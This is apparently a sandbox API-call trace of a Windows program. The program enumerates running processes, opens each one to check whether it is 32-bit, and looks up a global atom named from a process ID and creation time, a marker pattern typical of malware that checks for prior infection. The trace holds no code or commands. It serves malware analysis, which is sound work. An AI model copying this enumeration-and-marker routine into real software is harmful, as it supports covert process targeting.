	[0083.961] CloseHandle (hObject=0x508) returned 1
	[0083.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39568f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0083.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x508
	[0083.961] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.961] CloseHandle (hObject=0x508) returned 1
	[0083.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x3956728, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0083.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x508
	[0083.962] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.962] CloseHandle (hObject=0x508) returned 1
	[0083.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x39531d0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0083.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x508
	[0083.962] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.962] CloseHandle (hObject=0x508) returned 1
	[0083.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x3956770, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x508
	[0083.962] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.962] CloseHandle (hObject=0x508) returned 1
	[0083.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x3953070, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0083.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x508
	[0083.962] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.962] CloseHandle (hObject=0x508) returned 1
	[0083.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x3954f40, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0083.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x508
	[0083.963] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.963] CloseHandle (hObject=0x508) returned 1
	[0083.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x3954d10, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0083.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x508
	[0083.963] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.963] CloseHandle (hObject=0x508) returned 1
	[0083.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x3956860, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0083.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x508
	[0083.963] GetLastError () returned 0x5
	[0083.963] GetLastError () returned 0x5
	[0083.963] GetLastError () returned 0x5
	[0083.963] GetLastError () returned 0x5
	[0083.963] GetLastError () returned 0x5
	[0083.963] GetLastError () returned 0x5
	[0083.963] GetLastError () returned 0x5
	[0083.963] GetLastError () returned 0x5
	[0083.963] GetLastError () returned 0x5
	[0083.963] GetLastError () returned 0x5
	[0083.963] GetLastError () returned 0x5
	[0083.963] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetLastError () returned 0x5
	[0083.964] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.965] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0083.965] GetProcessTimes (in: hProcess=0x508, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] wsprintfA (in: param_1=0x3953898, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.965] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.966] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetLastError () returned 0x5
	[0083.967] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.967] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0083.967] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.967] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0083.967] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0083.967] CloseHandle (hObject=0x508) returned 1
	[0083.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0083.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x3956890, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0083.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39568d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x508
	[0083.968] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.968] CloseHandle (hObject=0x508) returned 1
	[0083.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39569c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0083.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0083.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x3956968, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16de0) returned 0xc0000004
	[0084.126] VirtualAlloc (lpAddress=0x0, dwSize=0x16ee0, flAllocationType=0x3000, flProtect=0x4) returned 0x39f0000
	[0084.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x39f0000, Length=0x16ee0, ResultLength=0x0 | out: SystemInformation=0x39f0000, ResultLength=0x0) returned 0x0
	[0084.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0084.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x397dff0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0084.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0084.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x3956230, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0084.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x3956368, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0084.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39562f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0084.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39563c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0084.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x3956368, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0084.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x3956368, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0084.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39561d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0084.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0084.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x397aa70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0084.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956368, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0084.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956128, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0084.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39561d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0084.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956128, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0084.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39562a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0084.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39563c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0084.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39563c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0084.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39561b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x558
	[0084.132] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.133] CloseHandle (hObject=0x558) returned 1
	[0084.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x3956308, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0084.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956230, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0084.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x398caa8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x558
	[0084.133] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.133] CloseHandle (hObject=0x558) returned 1
	[0084.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x398cd28, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0084.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0084.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956248, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x558
	[0084.134] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.134] CloseHandle (hObject=0x558) returned 1
	[0084.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39560e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x558
	[0084.134] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.134] CloseHandle (hObject=0x558) returned 1
	[0084.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39562d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x558
	[0084.134] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.134] CloseHandle (hObject=0x558) returned 1
	[0084.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39562a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x558
	[0084.135] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.135] CloseHandle (hObject=0x558) returned 1
	[0084.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x398cca8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x558
	[0084.135] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.135] CloseHandle (hObject=0x558) returned 1
	[0084.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x3956188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x558
	[0084.135] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.135] CloseHandle (hObject=0x558) returned 1
	[0084.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x3956158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0084.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39560e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x558
	[0084.136] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.136] CloseHandle (hObject=0x558) returned 1
